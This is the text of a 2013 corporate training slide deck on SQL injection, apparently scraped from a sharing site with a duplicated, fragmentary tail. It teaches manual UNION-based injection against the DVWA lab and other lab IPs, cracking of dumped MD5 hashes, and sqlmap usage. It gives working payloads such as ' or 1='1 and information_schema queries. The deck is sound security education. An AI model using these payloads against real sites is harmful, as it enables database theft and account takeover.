CyberSession SQL Injection

SQL Injection using manual and automated techniques (sqlmap)
Nik Roby 8 October 2013 nroby@keywcorp.com

KEYW Corporation 7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076 T: 443.733.1600 cybertraining@keywcorp.com training.keywcorp.com
What is SQL Injection?

SQL injection (SQLi) is the injection of malicious SQL statements into web application queries Results in additional data being displayed in the web pages response Commonly used to extract usernames and passwords
KEYW Corporation
7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076
T: 443.733.1600
cybertraining@keywcorp.com
training.keywcorp.com
SQL Injection attack type
Web Application
Inject Commands
Data Returned Malicious host Web/DB Server
KEYW Corporation
T: 443.733.1600
Database backed web applications

Web applications, like Wordpress, Joomla, MS Sharepoint, Drupal, all have a database that helps generate web pages. A database is essentially, a collection of many related spreadsheets with columns and rows. SQL is the most common language used to talk to a database.
SQL DATABASE
Users Table
id password username
Blog Entries
id blog_post
Products Table
id name description
KEYW Corporation
T: 443.733.1600
SQL Basics
SELECT Extracts data from a table
SELECT username, phone_number FROM users WHERE username=Bob;
INSERT INTO Adds new row of data

INSERT INTO users (username, password) VALUES (frank, easy);
UPDATE Changes data of existing record

UPDATE users SET username=awesomesauce WHERE username=Bob;
KEYW Corporation
T: 443.733.1600
SQL Basics (continued)

DELETE Removes a record from a table DELETE FROM users WHERE username=Bob;
UNION Combines two select statements SELECT first_name, last_name FROM users WHERE id=1 UNION SELECT first_name, email FROM users WHERE a=a;
#,-- , /*comment*/
Comment syntax is used to close/balance SQL queries, also used to assist in malicious SQL statements
KEYW Corporation
T: 443.733.1600
SQL Attack Process

1. 2. 3. 4. 5. 6. Map the application to find vectors Solicit and error break it Determine the number of columns Extract table names Extract column names Extract the data
KEYW Corporation
T: 443.733.1600
What can an SQL Injection do?

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can:
1. Read sensitive data from the database 2. Modify database data (Insert/Update/Delete) 3. Execute administration operations on the database (such as shutdown MySQL) 4. Read the content of a given file present on the DBMS file system 5. In some cases issue commands to the operating system
KEYW Corporation
T: 443.733.1600
Lets do a manual SQL Injection !
KEYW Corporation
T: 443.733.1600
Class SQL Workshop
password
KEYW Corporation
T: 443.733.1600
10
SQL Injection: First Step

Website requires user input or performs some dynamic querying. Attacker will need to map the web application to find potential vectors
For SQLi we will be using DVWA SQL injection example set to low
Try to identify the web server software and database backend
KEYW Corporation
T: 443.733.1600
11
Set Security to low
1. Click on DVWA Security
2. Select low
3. Click Submit
KEYW Corporation
T: 443.733.1600
12
Applying SQL Injection: Second Step

Page takes user input Numerical ID returns information We can reason the query looks similar to:
SELECT <first_name>, <surname> FROM <table_name> WHERE <id>='<input_value>';
Number of columns are unknown, but is implied at least two
KEYW Corporation
T: 443.733.1600
13
Applying SQL Injection: Find the Injection

Need to break the SQL statement to determine if app is vulnerable to SQLi A single () or double () quote may work Results in syntax error
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
KEYW Corporation
T: 443.733.1600
14
SQL Injection: Find the Injectable Piece

Knowing that we can break the statement, we can attempt injection We can extract data by providing a test that is true
or 1=1
What is looks like to the database:

SELECT first_name, last_name FROM users WHERE user_id='' or 1='1'; Does user_id = '' or does 1='1' ?
We now have a viable SQLi vector!
KEYW Corporation
T: 443.733.1600
15
SQL Injection: Determine Column Count

Our vector is based on a SELECT statement we will UNION it with our injected statement The two SQL statements must match in column number and type Order By <number_of_columns>
ORDER BY 1#
Null column enumeration

UNION SELECT 1 # UNION SELECT 1, 2 # UNION SELECT 1, 2, 3 # UNION SELECT 1, 2, 3, 4 #
16
SQL Injection: Database Enumberation

Determine the database type and version
UNION SELECT 1, @@version #
Note, this is a MySQL specific command, if it were another database such as mssql, it would have failed SQL differs between database type and version Full statement: SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT 1, @@version #' "
KEYW Corporation
T: 443.733.1600
17
SQL Injection: Extracting Data

The Database contains many tables, each like a spreadsheet. They often link to each other Find the table that looks like it contains valuable data
SQL DATABASE
users Table
id password username
VIEWS Table
id usr
columns_priv Table
id db host
KEYW Corporation
T: 443.733.1600
18
Applying SQL Injection: Fifth Step

Extract table names from the database
UNION SELECT table_name, null FROM information_schema.tables WHERE 1=1
KEYW Corporation
T: 443.733.1600
19
SQL Injection: Extract Column Names

Extract column names
UNION SELECT column_name, null FROM information_schema.columns WHERE table_name = users
user_id
password
avatar
first_name
last_name
user
table_name = 'users'
KEYW Corporation
T: 443.733.1600
20
SQL Injection: Extract the Data

Extract Data
UNION SELECT user, password FROM users WHERE 1=1
id
1 2 3
user
admin gordonb 1337
avatar
http://192.168... http://192.168... http://192.168...
password
...
...
...
...
KEYW Corporation
T: 443.733.1600
21
Google or Crack the hashes: admin
5f4dcc3b5aa765d61d8327deb882cf99 is the MD5 hash of the word: password
KEYW Corporation
T: 443.733.1600
22
Google or Crack the hashes: gordonb
e99a18c428cb38d5f260853678922e03 is the MD5 hash of the word: abc123
I can now log into dvwa, with the username gordonb and the password of abc123 !
23
Lets try SQL on another site! Go to: http://11.22.33.12
KEYW Corporation
T: 443.733.1600
24
Web Site Database Exploits
KEYW Corporation
T: 443.733.1600
25
Find the vulnerable parameter
http://172.16.35.12/announcement.php?a_id=' or 1='1
KEYW Corporation
T: 443.733.1600
26
Perform a UNION SELECT to get users
http://172.16.35.12/announcement.php?a_id=' UNION SELECT null, username, null, powercontrol FROM users WHERE 1='1
KEYW Corporation
T: 443.733.1600
27
Perform a UNION SELECT to get users
http://172.16.35.13/announcement.php?a_id=' UNION SELECT null, username, null, passwordhash FROM users WHERE 1='1
KEYW Corporation
T: 443.733.1600
28
Find the hash online
Username: jlilley Password: jellybean
KEYW Corporation
T: 443.733.1600
29
Log in with cracked credentials
Username: Password:
jlilley jellybean
KEYW Corporation
T: 443.733.1600
30
Make it easy for me: sqlmap
KEYW Corporation
T: 443.733.1600
31
KEYW Corporation
T: 443.733.1600
32
sqlmap

Python script to perform automated SQL injections and extract data Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems. Full support for six SQL injection techniques: boolean-based blind, timebased blind, error-based, UNION query, stacked queries and out-ofband. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
KEYW Corporation
T: 443.733.1600
33
sqlmap
Developers
Bernardo Damele A. G. (@inquisb) Miroslav Stampar (@stamparm)
Website: sqlmap.org
KEYW Corporation
T: 443.733.1600
34
Sqlmap: wizard mode for beginners

Wizard mode is a way to introduce you to using sqlmap Need to supply a cookie for some kinds of website attacks (POST)
KEYW Corporation
T: 443.733.1600
35
Sqlmap wizard
KEYW Corporation
T: 443.733.1600
36
Sqlmap: wizard results

Discovered DB is MySQL Shows a number of SQL Injections on the id parameter
KEYW Corporation
T: 443.733.1600
37
Sqlmap: Crack and extract passwords
KEYW Corporation
T: 443.733.1600
38
Work on your own

Try your on on www.crazychinchilla.com
KEYW Corporation
T: 443.733.1600
39
Questions?
KEYW Corporation
T: 443.733.1600
40
www.keywcorp.com/cybersessions
October Events:
Recovering Deleted USB files 10 October 2013, (Thursday) Web Application Attacks 15 October 2013, (Tuesday) Wi-Fi Hacking and Honeypots 17 October 2013, (Thursday)
KEYW Corporation 7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076
Recovering Deleted USB files 22 October 2013, (Tuesday) Metasploit Crash Course 24 October 2013, (Thursday) Mobile Phone Security 29 October 2013, (Tuesday)
T: 443.733.1600 cybertraining@keywcorp.com training.keywcorp.com
41

CyberSession SQL Injection

Загружено:

Сведения о документе

Исходное описание:

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

CyberSession SQL Injection

Загружено:

Авторское право:

Доступные форматы

SQL Injection using manual and automated techniques (sqlmap)

Nik Roby 8 October 2013 nroby@keywcorp.com

What is SQL Injection?

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

SQL Injection attack type

Data Returned Malicious host Web/DB Server

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Database backed web applications

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

INSERT INTO Adds new row of data

UPDATE Changes data of existing record

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

SQL Basics (continued)

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

SQL Attack Process

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

What can an SQL Injection do?

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Lets do a manual SQL Injection !

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Class SQL Workshop

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

SQL Injection: First Step

Try to identify the web server software and database backend

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Set Security to low

1. Click on DVWA Security

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Applying SQL Injection: Second Step

Number of columns are unknown, but is implied at least two

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Applying SQL Injection: Find the Injection

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

SQL Injection: Find the Injectable Piece

What is looks like to the database:

We now have a viable SQLi vector!

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

SQL Injection: Determine Column Count

Null column enumeration

SQL Injection: Database Enumberation

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

SQL Injection: Extracting Data

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Applying SQL Injection: Fifth Step

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

SQL Injection: Extract Column Names

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

SQL Injection: Extract the Data

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Google or Crack the hashes: admin

5f4dcc3b5aa765d61d8327deb882cf99 is the MD5 hash of the word: password

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Google or Crack the hashes: gordonb

e99a18c428cb38d5f260853678922e03 is the MD5 hash of the word: abc123

Lets try SQL on another site! Go to: http://11.22.33.12

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Web Site Database Exploits

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Find the vulnerable parameter

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076

Perform a UNION SELECT to get users

7740 Milestone Parkway | Suite 500 | Hanover, Maryland | 21076